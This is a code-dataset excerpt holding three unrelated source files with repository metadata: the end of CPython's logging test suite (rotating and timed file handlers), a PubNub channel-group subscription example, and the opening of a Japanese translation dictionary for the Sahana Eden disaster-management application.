os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
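# test_rotator exercises the namer/rotator hooks: namer() appends ".gz" to the
# backup filenames and rotator() writes a zlib-compressed copy of the rotated log,
# which the test then decompresses and checks against the emitted messages.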
@requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
#print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
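# The loop below generates one test_compute_rollover_<when> method per rollover
# specifier and attaches it to TimedRotatingFileHandlerTest (this is what the
# "other test methods added below" comment in that class refers to).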
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
h = logging.handlers.NTEventLogHandler('test_logging')
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertTrue(num_recs < win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, HandlerTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, DatagramHandlerTest,
MemoryTest, EncodingTest, WarningsTest, ConfigDictTest,
ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest,
BasicConfigTest, LoggerAdapterTest, LoggerTest,
SMTPHandlerTest, FileHandlerTest, RotatingFileHandlerTest,
LastResortTest, LogRecordTest, ExceptionTest,
SysLogHandlerTest, HTTPHandlerTest, NTEventLogHandlerTest,
TimedRotatingFileHandlerTest
)
if __name__ == "__main__":
test_main()
|
MalloyPower/parsing-python
|
front-end/testsuite-python-lib/Python-3.3.0/Lib/test/test_logging.py
|
Python
|
mit
| 134,314
|
## www.pubnub.com - PubNub Real-time push service in the cloud.
# coding=utf8
## PubNub Real-time Push APIs and Notifications Framework
## Copyright (c) 2010 Stephen Blum
## http://www.pubnub.com/
import sys
from pubnub import Pubnub as Pubnub
publish_key = len(sys.argv) > 1 and sys.argv[1] or 'demo'
subscribe_key = len(sys.argv) > 2 and sys.argv[2] or 'demo'
secret_key = len(sys.argv) > 3 and sys.argv[3] or 'demo'
cipher_key = len(sys.argv) > 4 and sys.argv[4] or 'abcd'
ssl_on = len(sys.argv) > 5 and bool(sys.argv[5]) or False
## -----------------------------------------------------------------------
## Initiate Pubnub State
## -----------------------------------------------------------------------
pubnub = Pubnub(publish_key=publish_key, subscribe_key=subscribe_key,
secret_key=secret_key, cipher_key=cipher_key, ssl_on=ssl_on)
channel = 'ab'
# Asynchronous usage
def callback_abc(message, channel, real_channel):
print(str(message) + ' , ' + channel + ', ' + real_channel)
pubnub.unsubscribe_group(channel_group='abc')
#pubnub.stop()
def callback_d(message, channel):
print(str(message) + ' , ' + channel)
def error(message):
print("ERROR : " + str(message))
def connect_abc(message):
print("CONNECTED " + str(message))
def connect_d(message):
print("CONNECTED " + str(message))
pubnub.unsubscribe(channel='d')
def reconnect(message):
print("RECONNECTED " + str(message))
def disconnect(message):
print("DISCONNECTED " + str(message))
print(pubnub.channel_group_add_channel(channel_group='abc', channel="b"))
pubnub.subscribe_group(channel_groups='abc', callback=callback_abc, error=error,
connect=connect_abc, reconnect=reconnect, disconnect=disconnect)
pubnub.subscribe(channels='d', callback=callback_d, error=error,
connect=connect_d, reconnect=reconnect, disconnect=disconnect)
pubnub.start()
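# Example invocation (illustrative note, not part of the PubNub API; all arguments
# are optional and fall back to the 'demo' keys used above):
#   python subscribe_group.py <publish_key> <subscribe_key> <secret_key> <cipher_key> <ssl_on>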
|
teddywing/pubnub-python
|
python/examples/subscribe_group.py
|
Python
|
mit
| 1,925
|
# -*- coding: utf-8 -*-
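# Localization dictionary: each key is an English source string used by the
# application and each value is its Japanese translation.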
{
"A location that specifies the geographic area for this region. This can be a location from the location hierarchy, or a 'group location', or a location that has a boundary for the area.": 'この地域を地理的に指定するロケーション。これはロケーションの階層構造のうちの一つか、ロケーショングループの一つか、この地域の境界に面するロケーションです。',
"Acronym of the organization's name, eg. IFRC.": '団体の略称 (IFRCなど)',
"Authenticate system's Twitter account": '認証システムの Twitter アカウント',
"Can't import tweepy": 'tweepyをインポートできません',
"Click on 'Pledge' button in the left-hand column to make a Pledge to match a request for aid.": "救援要請と寄付項目を関連付けるには、項目左の'寄付'ボタンを押してください。",
"Couldn't import tweepy library": 'tweepy libraryをインポートできません',
"Detailed address of the site for informational/logistics purpose. Please note that you can add GIS/Mapping data about this site in the 'Location' field mentioned below.": 'サイトの所在地住所を詳細に記述します。情報伝達と物品搬送に使用します。このサイトに関する情報を、以下の「ロケーション」項目にGIS/地図データを挿入できることに注意してください。',
"If this configuration represents a region for the Regions menu, give it a name to use in the menu. The name for a personal map configuration will be set to the user's name.": 'もしこの設定が地域メニューにある地域を指しているのであれば、メニューで使う名前を設定してください。個人用の地図設定の名前では、ユーザの名前で設定されます。',
"If this field is populated then a user who specifies this Organization when signing up will be assigned as a Staff of this Organization unless their domain doesn't match the domain field.": 'この項目が設定されている場合、ユーザーは、登録の際、この団体のスタッフとしてアサインされるように指定することができます。ただし、ユーザーのドメインと団体のドメイン項目に差異がない場合のみ有効です。',
"If this is ticked, then this will become the user's Base Location & hence where the user is shown on the Map": 'この項目の内容はユーザーの基本所在地となり、ユーザーが地図上に表示されるようになります。',
"If this setting is enabled then all deleted records are just flagged as deleted instead of being really deleted. They will appear in the raw database access but won't be visible to normal users.": 'この設定が有効の場合、削除されたレコードには削除済みフラグが付与されるだけで、実際のデータは消去されません。一般のユーザが閲覧することはできませんが、データベースを直接参照することでデータを確認できます。',
"If you cannot find the record of the person you want to report missing, you can add it by clicking 'Add Person' below:": '行方不明者の登録が存在しない場合、「人物情報を追加」ボタンを押して、新規登録を行ってください。',
"If you don't see the Hospital in the list, you can add a new one by clicking link 'Create Hospital'.": 'リストに病院が表示されない場合、「病院情報を追加」することで新規に登録が可能です。',
"If you don't see the Office in the list, you can add a new one by clicking link 'Create Office'.": 'オフィスが一覧にない場合は、「オフィスを追加」をクリックすることで新規のオフィスを追加できます。',
"If you don't see the Organization in the list, you can add a new one by clicking link 'Create Organization'.": "もしあなたの団体の登録がない場合、'団体を追加'リンクをクリックすることで追加が可能です",
"Instead of automatically syncing from other peers over the network, you can also sync from files, which is necessary where there's no network. You can use this page to import sync data from files and also export data to sync files. Click the link on the right to go to this page.": 'データを同期する際には、ネットワークを経由してではなく、ファイルから行うことも可能です。ネットワークが存在しない場合に利用されます。ファイルからのデータインポート、およびファイルへのエクスポートはこのページから実行可能です。右部のリンクをクリックしてください。',
"Level is higher than parent's": '親情報よりも高いレベルです',
"NB SMS requests are filtered to just those which are 'actionable', whilst the Tweet requests are unfiltered, so that is likely to be a good place to start Searching.": "注意: SMS は'アクション可能'のためリクエストがフィルターされます。一方、ツイートのリクエストはフィルターされません。よって、これは検索する手段となります",
"Need a 'url' argument!": "'url'引数が必要です。",
"Optional. The name of the geometry column. In PostGIS this defaults to 'the_geom'.": "オプション項目。ジオメトリカラムの名称です。PostGISでのデフォルト値は 'the_geom'となります。",
"Parent level should be higher than this record's level. Parent level is": '親レベルは、このレコードのレベルより上位でなければなりません。親レベルは',
"Password fields don't match": 'パスワードが一致しません。',
"Phone number to donate to this organization's relief efforts.": 'この団体の救援活動に対して寄付を行う際の連絡先となる電話番号を記載します。',
"Please come back after sometime if that doesn't help.": 'この方法で問題が解決しない場合は、しばらく時間を置いて再度アクセスしてください。',
"Press the 'Delete Old' button to have all records which reference this one be repointed at the new one & then the old record will be deleted.": "'Delete Old'ボタンを押すことで、データを参照しているレコードは全て参照先を再指定され、古い方のレコードは削除されます。",
"Quantity in %s's Inventory": '%s 倉庫にある量',
"Search here for a person's record in order to:": '人物情報の検索を行い、以下の機能を実現します:',
"Select a person in charge for status 'assigned'": "状況が '割り当て済み' である担当者を選択します",
"Select this if all specific locations need a parent at the deepest level of the location hierarchy. For example, if 'district' is the smallest division in the hierarchy, then all specific locations would be required to have a district as a parent.": 'もし全ての特定の場所が住所階層の最下層で親の場所を必要とするなら、これを選択して下さい。例えば、もし「地区」が階層の最小の地域なら、全ての特定の場所は親階層の地区を持っている必要が有るでしょう。',
"Select this if all specific locations need a parent location in the location hierarchy. This can assist in setting up a 'region' representing an affected area.": 'もし全ての特定の場所が住所階層での親の場所を必要とするなら、これを選択して下さい。これは被災地の「地域」表示の設定に役立てられます。',
"Sorry, things didn't get done on time.": 'すいません、時間通りに行われていません。',
"Sorry, we couldn't find that page.": 'すいません、お探しのページは見つかりませんでした。',
"System's Twitter account updated": 'システムのTwitterアカウントを変更しました',
"The <a href='http://en.wikipedia.org/wiki/Well-known_text' target=_blank>Well-Known Text</a> representation of the Polygon/Line.": "この線、あるいは面の<a href='http://en.wikipedia.org/wiki/Well-known_text' target=_blank>具体的な説明</a>",
"The Donor(s) for this project. Multiple values can be selected by holding down the 'Control' key.": 'このプロジェクトの資金提供組織を選択します。複数の項目を選択するには、Ctrlキーを押しながらクリックしてください。',
"The Sector(s) this organization works in. Multiple values can be selected by holding down the 'Control' key.": 'この団体の活動分野を選択します。複数の項目を選択するには、コントロールキーを押しながらクリックしてください。',
"The URL of the image file. If you don't upload an image file, then you must specify its location here.": '画像ファイルのURLです。ファイルのアップロードを行わない場合、ロケーションをURL項目に入力してください。',
"The person's manager within this Office/Project.": 'このオフィス/プロジェクトのマネージャ。',
"To search for a body, enter the ID label of the body. You may use % as wildcard. Press 'Search' without input to list all bodies.": '遺体の検索を行うには、遺体のID番号を入力してください。検索時のワイルドカード文字として、%を使うことができます。入力せずに「検索」すると、全ての遺体が表示されます。',
"To search for a body, enter the ID tag number of the body. You may use % as wildcard. Press 'Search' without input to list all bodies.": 'ID情報を入力することで、遺体を検索します。ワイルドカードとして % が使用できます。何も指定せずに「検索」すると、全ての遺体が表示されます。',
"To search for a hospital, enter any of the names or IDs of the hospital, or the organization name or acronym, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all hospitals.": "病院を検索するには、名前、病院のID、団体名、省略名のいずれかをスペース(空白)で区切って入力してください。 % がワイルドカードとして使えます。全病院のリストを表示するにはなにも入力せずに '検索' ボタンを押してください。",
"To search for a hospital, enter any of the names or IDs of the hospital, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all hospitals.": '探し出したい病院をテキスト入力し、検索を行うことができます。検索時のワイルドカード文字として、%を使うことができます。何も入力せずに「検索」ボタンを押した場合、全ての病院を表示します。',
"To search for a hospital, enter any part of the name or ID. You may use % as wildcard. Press 'Search' without input to list all hospitals.": '病院を検索するには、名称の一部かIDを入力してください。検索時のワイルドカード文字として、%を使うことができます。何も入力せずに「検索」を押した場合、全ての病院を表示します。',
"To search for a location, enter the name. You may use % as wildcard. Press 'Search' without input to list all locations.": "ロケーションを検索するには、名前を入力します。%をワイルドカード文字として使用することが出来ます。何も入力しないで '検索' をクリックするとすべてのロケーションが表示されます。",
"To search for a person, enter any of the first, middle or last names and/or an ID number of a person, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons.": '苗字、名前などを半角スペースで区切って入力し、人物検索して下さい。「%」を使うとファジー検索できます。何も入力せずに検索すれば、全ての情報を検索表示します。',
"To search for a person, enter any of the first, middle or last names, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons.": '人を検索するためには、お名前(苗字、名前または両方)を入力してください。また姓名の間にはスペースをいれてください。ワイルドカードとして % が使えます。すべての人物情報をリストするには、検索ボタンをおしてください。',
"To search for a request, enter some of the text that you are looking for. You may use % as wildcard. Press 'Search' without input to list all requests.": '探し出したい支援要請をテキスト入力し、検索を行うことができます。検索時のワイルドカード文字として、%を使うことができます。何も入力せずに「検索」ボタンを押した場合、全ての支援要請を表示します。',
"To search for an assessment, enter any portion the ticket number of the assessment. You may use % as wildcard. Press 'Search' without input to list all assessments.": 'アセスメントを検索するには、アセスメントのチケット番号の一部を入力してください。ワイルドカードとして % が使えます。すべてのアセスメントをリストするには、なにも入力せず検索ボタンをおしてください。',
"Type the first few characters of one of the Person's names.": '検索したい人物の名前の先頭数文字を入力してください',
"Upload an image file here. If you don't upload an image file, then you must specify its location in the URL field.": '画像ファイルのアップロードはここから行ってください。ファイルのアップロードを行わない場合、ロケーションをURL項目に入力してください。',
"View and/or update details of the person's record": '人物情報を検索し、詳細の閲覧や更新を行ないます',
"View/Edit the Database directly (caution: doesn't respect the framework rules!)": 'データベースの直接閲覧/編集(注意:フレームワークの規則に反します)',
"What are the people's normal ways to obtain food in this area?": 'この地域で食料を調達するための手段を記載してください',
"What should be done to reduce women and children's vulnerability to violence?": '未成年や女性を暴力から守るために、どのような活動や設備が必要かを記載してください',
"When syncing data with others, conflicts happen in cases when two (or more) parties want to sync information which both of them have modified, i.e. conflicting information. Sync module tries to resolve such conflicts automatically but in some cases it can't. In those cases, it is up to you to resolve those conflicts manually, click on the link on the right to go to this page.": '他とデータを同期するとき、二つ(以上)の団体がそれぞれ更新した情報を同期するときにコンフリクトが発生することがあります。同期モジュールは、コンフリクトを自動解決しようと試みますが、解決できないことがあります。そのような場合、手作業でコンフリクトを解決するか、クリックして次のページに進んでください。',
"You have personalised settings, so changes made here won't be visible to you. To change your personalised settings, click ": 'ユーザ固有の設定を行っている場合、ここで変更を行っても、目に見える変化がない場合があります。ユーザ固有の設定を行うには、以下をクリックしてください。 ',
"You have unsaved changes. Click Cancel now, then 'Save' to save them. Click OK now to discard them.": '変更が保存されていません。「キャンセル」をクリックした後、「保存」を押して保存してください。変更を破棄するには、OK をクリックしてください。',
"You haven't made any calculations": '計算が実行されていません',
"You haven't yet Verified your account - please check your email": '利用者登録はまだ有効ではありません。',
"couldn't be parsed so NetworkLinks not followed.": 'パースできなかったため、 NetworkLinksはフォローされません。',
"includes a GroundOverlay or ScreenOverlay which aren't supported in OpenLayers yet, so it may not work properly.": 'OpenLayersで未サポートの機能である GroundOverlayやScreenOverlayを含むため、不具合がある可能性があります。',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"更新" は、"field1=\'newvalue\'" のようなオプションです。"JOIN の結果を更新または削除することはできません。',
'# Houses Damaged': '損傷した家屋の数',
'# Houses Flooded': '浸水した家屋数',
'# People Needing Food': '食料が必要な人の数',
'# People at Risk From Vector-Borne Diseases': '生物が媒介する疾病の危険性がある人の数',
'# People without Access to Safe Drinking-Water': '安全な飲料水が確保されていない人の数',
'# of Houses Damaged': '損壊した家屋数',
'# of Houses Destroyed': '全壊した家屋数',
'# of International Staff': '国外スタッフ人数',
'# of National Staff': '国内スタッフの人数',
'# of People Affected': '被災者数',
'# of People Deceased': '死亡者数',
'# of People Injured': '負傷者数',
'# of Vehicles': '車両数',
'%s Create a new site or ensure that you have permissions for an existing site.': '%s 新しいサイトを作成するか既存のサイトに対する権限を持っているかどうか確認して下さい',
'%s rows deleted': '%s 行を削除しました',
'%s rows updated': '%s 行を更新しました',
'& then click on the map below to adjust the Lat/Lon fields': 'そして下の地図をクリックして、緯度 / 経度フィールドを調節してください',
'* Required Fields': '* は必須項目です',
'0-15 minutes': '0-15 分間',
'1 Assessment': '1アセスメント',
'1 location, shorter time, can contain multiple Tasks': '1つの地域における短期間の活動を表し、1つの支援活動のなかで複数のタスクを実行します。',
'1-3 days': '1-3 日間',
'1. Fill the necessary fields in BLOCK letters.': '1. 太字の項目は必須項目です.',
'15-30 minutes': '15-30 分間',
'2 different options are provided here currently:': '現在は、2種類のオプションが提供されています。',
'2. Always use one box per letter and leave one box space to seperate words.': '2. 一マス一文字で、単語の間は一マス開けてください。',
'2x4 Car': '2x4 車両',
'30-60 minutes': '30-60 分間',
'4-7 days': '4-7 日間',
'4x4 Car': '四輪駆動車',
'8-14 days': '8-14 日間',
'A Marker assigned to an individual Location is set if there is a need to override the Marker assigned to the Feature Class.': '機能クラスに設定したマーカーを上書きする必要があれば、個々のロケーションに設定したマーカーを設定します',
'A Reference Document such as a file, URL or contact person to verify this data. You can type the 1st few characters of the document name to link to an existing document.': 'このデータ内容を確認できるファイルやURL情報、連絡先担当者などのリファレンスデータを記載します。最初の何文字かを入力することで、既存の類似文書にリンクすることが可能です。',
'A Warehouse is a physical place which contains Relief Items available to be Distributed.': '倉庫とは、救援物資の配布を行うことができる物理的な地点を意味します。',
'A Warehouse/Site is a physical location with an address and GIS data where Items are Stored. It can be a Building, a particular area in a city or anything similar.': '倉庫 / サイトとは、物資の保管場所のことであり、住所とGIS情報が付帯します。特定の建物や、市内の特定地域などがあげられます。',
'A brief description of the group (optional)': 'グループの詳細(オプション)',
'A file downloaded from a GPS containing a series of geographic points in XML format.': 'GPSからダウンロードしたファイルには、その地点に関する様々な情報がXML形式で保存されています。',
'A file in GPX format taken from a GPS whose timestamps can be correlated with the timestamps on the photos to locate them on the map.': 'GPSから取得したGPX形式のファイル。タイムスタンプは画像と関連づけられ、地図上に配置することができます。',
'A library of digital resources, such as photos, documents and reports': '写真や文書、レポートなど、電子化された資料',
'A location group is a set of locations (often, a set of administrative regions representing a combined area). Member locations are added to a location group here. Location groups may be used to filter what is shown on the map and in search results to only entities covered by locations in the group. A location group can be used to define the extent of an affected area, if it does not fall within one administrative region. Location groups can be used in the Regions menu.': 'ロケーションを取りまとめた単位はロケーショングループと呼称されます(たいていは、一定範囲内の管理対象地域をさします)。このページから、ロケーションをグループに追加することができます。ロケーショングループ単位で地図上に表示させたり、検索結果として表示させることが可能となります。グループを使用することで、1つの管理地域に縛られない被災地域定義が可能となります。ロケーショングループは、地域メニューから定義できます。',
'A location group must have at least one member.': 'ロケーショングループには、メンバーが最低一人必要です。',
'A place within a Site like a Shelf, room, bin number etc.': 'Site内に存在する施設。例えば棚、部屋、Binの番号など',
'A snapshot of the bin or additional documents that contain supplementary information about it can be uploaded here.': 'binのスナップショットや追加情報の更新は、ここから行えます。',
'A snapshot of the location or additional documents that contain supplementary information about the Site Location can be uploaded here.': 'ロケーションのスナップショットや、Siteに関する追加情報の更新は、ここから行えます。',
'A snapshot of the location or additional documents that contain supplementary information about the Site can be uploaded here.': 'ロケーションのスナップショットや、Siteに関する追加情報の更新は、ここから行えます。',
'A survey series with id %s does not exist. Please go back and create one.': 'ID番号 %sに関するsurvey seriesは存在しません。「戻る」ボタンを押して、新規に作成してください。',
'ABOUT THIS MODULE': 'このモジュールについて',
'ABOUT': '概要',
'ACCESS DATA': 'アクセスデータ',
'ANY': '全て',
'API is documented here': 'APIに関する文書はこちら',
'ATC-20 Rapid Evaluation modified for New Zealand': 'ニュージーランド向けに変更したATC-20(建物の簡易安全性評価プロセス)',
'ATC-20': 'ATC-20(建物の簡易安全性評価プロセス)',
'Abbreviation': '省略',
'Ability to Fill Out Surveys': '調査記入能力',
'Ability to customize the list of details tracked at a Shelter': '避難所で追跡する詳細のリストのカスタマイズ可否',
'Ability to customize the list of human resource tracked at a Shelter': '避難所で追跡する人的資源のリストのカスタマイズの可否',
'Ability to customize the list of important facilities needed at a Shelter': '避難所で必要とされる重要な施設のリストのカスタマイズの可否',
'Ability to track partial fulfillment of the request': '支援要請の部分的な達成度の追跡可否',
'Ability to view Results of Completed and/or partially filled out Surveys': '完了または一部完了した聞き取り調査の結果をみる機能',
'About Sahana Eden': 'Sahana Edenについて',
'About Sahana': 'Sahanaについて',
'About this module': 'モジュールの詳細',
'About': '情報',
'Access denied': 'アクセスが拒否されました',
'Access to Shelter': '避難所へのアクセス',
'Access to education services': '学校へのアクセス',
'Accessibility of Affected Location': '被災地域へのアクセス方法',
'Account registered, however registration is still pending approval - please wait until confirmation received.': '利用者登録の申請を受け付けました。所属団体またはサイト管理者による承認を待っています。',
'Acronym': '略称/イニシャル',
'Actionable by all targeted recipients': 'すべての対象受信者にとって実用的な',
'Actionable only by designated exercise participants; exercise identifier SHOULD appear in <note>': '指定された参加者のみ実施可能です。<note>の中に行使するためのIDがあることが必要です。',
'Actionable': '対応可能',
'Actioned?': '実施済み?',
'Actions taken as a result of this request.': '要請に対して行われるアクション',
'Actions': 'アクション',
'Active Problems': '対処中の問題',
'Activities Map': '支援活動マップ',
'Activities are blue.': '支援活動(アクティビティ)は青色で表示されます。',
'Activities matching Assessments:': 'アセスメントに適合した支援活動',
'Activities of boys 13-17yrs before disaster': '災害発生前の13-17歳男子の活動状況',
'Activities of boys 13-17yrs now': '現在の13-17歳男子の活動状況',
'Activities of boys <12yrs before disaster': '災害発生前の12歳以下男子の活動状況',
'Activities of boys <12yrs now': '現在の12歳以下男子の活動状況',
'Activities of children': '子供たちの活動',
'Activities of girls 13-17yrs before disaster': '災害発生前の13-17歳女子の活動状況',
'Activities of girls 13-17yrs now': '現在の13-17歳女子の活動状況',
'Activities of girls <12yrs before disaster': '災害発生前の12歳以下女子の活動状況',
'Activities of girls <12yrs now': '現在の12歳以下女子の活動状況',
'Activities': '支援活動',
'Activity Added': '支援活動を追加しました',
'Activity Deleted': '支援活動を削除しました',
'Activity Details': '支援活動の詳細',
'Activity Report': '支援活動レポート',
'Activity Reports': '支援活動レポート',
'Activity Type': '支援活動タイプ',
'Activity Updated': '支援活動を更新しました',
'Activity': '支援活動',
'Add Address': 'アドレスを追加',
'Add Activity Type': '支援活動タイプを追加',
'Add Aid Request': '治療要請を追加',
'Add Alternative Item': '代わりの物資を追加',
'Add Assessment Summary': 'アセスメントの要約を追加',
'Add Assessment': 'アセスメントを追加',
'Add Baseline Type': '基準値タイプの追加',
'Add Baseline': '基準値の追加',
'Add Bin Type': 'Bin Typeを追加',
'Add Bins': 'Binを追加',
'Add Bundle': 'Bundleを追加',
'Add Catalog.': 'カタログを追加',
'Add Category': 'カテゴリを追加',
'Add Category<>Sub-Category<>Catalog Relation': 'Category<>Sub-Category<>Catalog 関係を追加',
'Add Config': '設定を追加',
'Add Contact': '連絡先を追加',
'Add Contact Information': '連絡先情報を追加',
'Add Credential': '証明書の追加',
'Add Credentials': '証明書の追加',
'Add Detailed Evaluation': '詳細な評価を追加',
'Add Disaster Victims': '被災者情報を追加',
'Add Distribution.': '配給所を追加',
'Add Donor': '資金提供組織を追加',
'Add Flood Report': '洪水レポートを追加',
'Add Group Member': 'グループメンバを追加',
'Add Identity': 'IDを追加',
'Add Image': '画像を追加',
'Add Impact Type': '災害影響のタイプを追加',
'Add Impact': '被災状況の追加',
'Add Inventory Item': '備蓄物資を追加します',
'Add Inventory Store': '物資集積地点を追加',
'Add Item (s)': '物資を追加',
'Add Item Catalog': '物資カタログを追加',
'Add Item Category': '救援物資カタログカテゴリを追加',
'Add Item Sub-Category': '救援物資サブカテゴリを追加',
'Add Item to Request': '要求する支援物資の登録',
'Add Item to Shipment': '輸送に物資を追加する',
'Add Item': '物資を追加',
'Add Key': 'Keyを追加',
'Add Kit': 'Kitを追加',
'Add Level 1 Assessment': 'レベル1アセスメントを追加',
'Add Level 2 Assessment': 'レベル2アセスメントを追加',
'Add Line': '行を追加',
'Add Location Group': 'ロケーショングループを追加',
'Add Locations': 'ロケーションを追加',
'Add Log Entry': 'ログエントリを追加',
'Add Member': 'メンバを追加',
